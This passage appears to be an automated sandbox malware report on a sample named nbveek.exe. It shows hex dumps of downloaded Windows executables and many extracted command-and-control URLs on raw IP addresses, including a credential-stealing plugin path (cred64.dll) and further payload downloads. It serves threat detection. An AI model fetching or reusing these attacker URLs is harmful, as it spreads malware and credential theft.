10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 6d 03 00 64 00 00 00 00 d0 03 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 03 00 70 28 00 00 c0 3f 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 40 03 00 18 00 00 00 30 40 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd c9 02 00 00 10 00 00 00 ca 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 98 00 00 00 e0 02 00 00 9a 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 44 00 00 00 80 03 00 00 18 00 00 00 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 03 00 00 02 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 28 00 00 00 e0 03 00 00 2a 00 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:58:31 GMTContent-Type: application/octet-streamContent-Length: 179200Last-Modified: Wed, 04 Jan 2023 22:51:54 GMTConnection: keep-aliveETag: "63b6030a-2bc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 5c 42 ca 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a4 01 00 00 14 01 00 00 00 00 00 aa b5 01 00 00 20 00 00 00 e0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 b5 01 00 4f 00 00 00 00 e0 01 00 1c 0f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 3c b5 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 a1 01 00 00 20 00 00 00 a4 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 0f 01 00 00 e0 01 00 00 10 01 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 04 00 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:59:03 GMTContent-Type: application/octet-streamContent-Length: 1074176Last-Modified: Wed, 04 Jan 2023 21:36:17 GMTConnection: keep-aliveETag: "63b5f151-106400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 91 86 1d 1c d5 e7 73 4f d5 e7 73 4f d5 e7 73 4f 8e 8f 77 4e c7 e7 73 4f 8e 8f 70 4e de e7 73 4f 8e 8f 76 4e 65 e7 73 4f 00 8a 76 4e 90 e7 73 4f 00 8a 77 4e da e7 73 4f 00 8a 70 4e dc e7 73 4f 8e 8f 72 4e d8 e7 73 4f d5 e7 72 4f 69 e7 73 4f 4e 89 7a 4e d1 e7 73 4f 4e 89 73 4e d4 e7 73 4f 4e 89 8c 4f d4 e7 73 4f 4e 89 71 4e d4 e7 73 4f 52 69 63 68 d5 e7 73 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 f1 b5 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 e8 0c 00 00 b2 03 00 00 00 00 00 48 eb 0a 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 10 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 7b 0f 00 58 00 00 00 c8 7b 0f 00 8c 00 00 00 00 b0 10 00 f8 00 00 00 00 00 10 00 e0 97 00 00 00 00 00 00 00 00 00 00 00 c0 10 00 68 14 00 00 10 aa 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 aa 0e 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 e6 0c 00 00 10 00 00 00 e8 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 8f 02 00 00 00 0d 00 00 90 02 00 00 ec 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 6f 00 00 00 90 0f 00 00 36 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e0 97 00 00 00 00 10 00 00 98 00 00 00 b2 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 a0 10 00 00 02 00 00 00 4a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 b0 10 00 00 02 00 00 00 4c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 14 00 00 00 c0 10 00 00 16 00 00 00 4e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 05 Jan 2023 07:59:13 GMTContent-Type: application/octet-streamContent-Length: 1034752Last-Modified: Thu, 05 Jan 2023 07:50:01 GMTConnection: keep-aliveETag: "63b68129-fca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 b7 a1 8c 86 d6 cf df 86 d6 cf df 86 d6 cf df 3b 99 59 df 87 d6 cf df 98 84 5a df 9f d6 cf df 98 84 4c df f9 d6 cf df a1 10 b4 df 83 d6 cf df 86 d6 ce df 05 d6 cf df 98 84 4b df a2 d6 cf df 98 84 5b df 87 d6 cf df 98 84 5e df 87 d6 cf df 52 69 63 68 86 d6 cf df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 37 03 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 01 00 00 2c 10 00 00 00 00 00 0e 60 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 11 00 00 04 00 00 6f 02 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 6d 01 00 3c 00 00 00 00 d0 10 00 b0 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 68 01 00 00 10 00 00 00 6a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b4 4f 0f 00 00 80 01 00 00 9e 0d 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 bc 00 00 00 d0 10 00 00 be 00 00 00 0c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:59:35 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 28 Dec 2022 20:50:50 GMTConnection: keep-aliveETag: "63acac2a-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                                Source: Joe Sandbox ViewIP Address: 62.204.41.109 62.204.41.109
                                Source: Joe Sandbox ViewIP Address: 62.204.41.109 62.204.41.109
                                Source: global trafficTCP traffic: 192.168.2.4:50575 -> 82.115.223.15:15486
                                Source: unknownNetwork traffic detected: IP country count 12
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.32.200.113/m/Nmkn5d9Dn/index.phpf
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.32.200.113/m/g8kdkeXs2qL/index.php
                                Source: nbveek.exe, 00000026.00000002.849584103.0000000003580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.32.200.113/mBsjv2swweP/index.php
                                Source: nbveek.exe, 00000026.00000002.849584103.0000000003580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.32.200.113/mBsjv2swweP/index.php12
                                Source: nbveek.exe, 00000026.00000002.849584103.0000000003580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.32.200.113/mBsjv2swweP/index.phpodez
                                Source: nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/Legno.exe
                                Source: nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/Legno.exe#
                                Source: nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/Legno.exe#-
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php%
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php-
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php1
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php27
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.php6e2227
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpD
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpG
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpM
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpQ
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpZ=
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpe
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpi
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpndows
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/g8kdkeXs2qL/index.phpp
                                Source: nbveek.exe, 0000000F.00000002.836273955.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.230.123/gmkn5d9Dn/index.php
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/3&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=001
                                Source: nbveek.exe, 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/Plugins/cred64.dll
                                Source: nbveek.exe, 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/Plugins/cred64.dllW
                                Source: nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/Plugins/cred64.dllaming
                                Source: nbveek.exe, 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/Plugins/cred64.dlle
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php-
                                Source: nbveek.exe, 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php/
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php0
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php001
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php9
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.php=
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpG
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpI
                                Source: nbveek.exe, 0000000F.00000002.836273955.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpU
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpUsers
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpY
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpco
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpcod
                                Source: nbveek.exe, 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpg
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpnco
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpncode
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpncodeo
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpq
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.109/Nmkn5d9Dn/index.phpt
                                Source: nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.145/ano/anon.exe
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
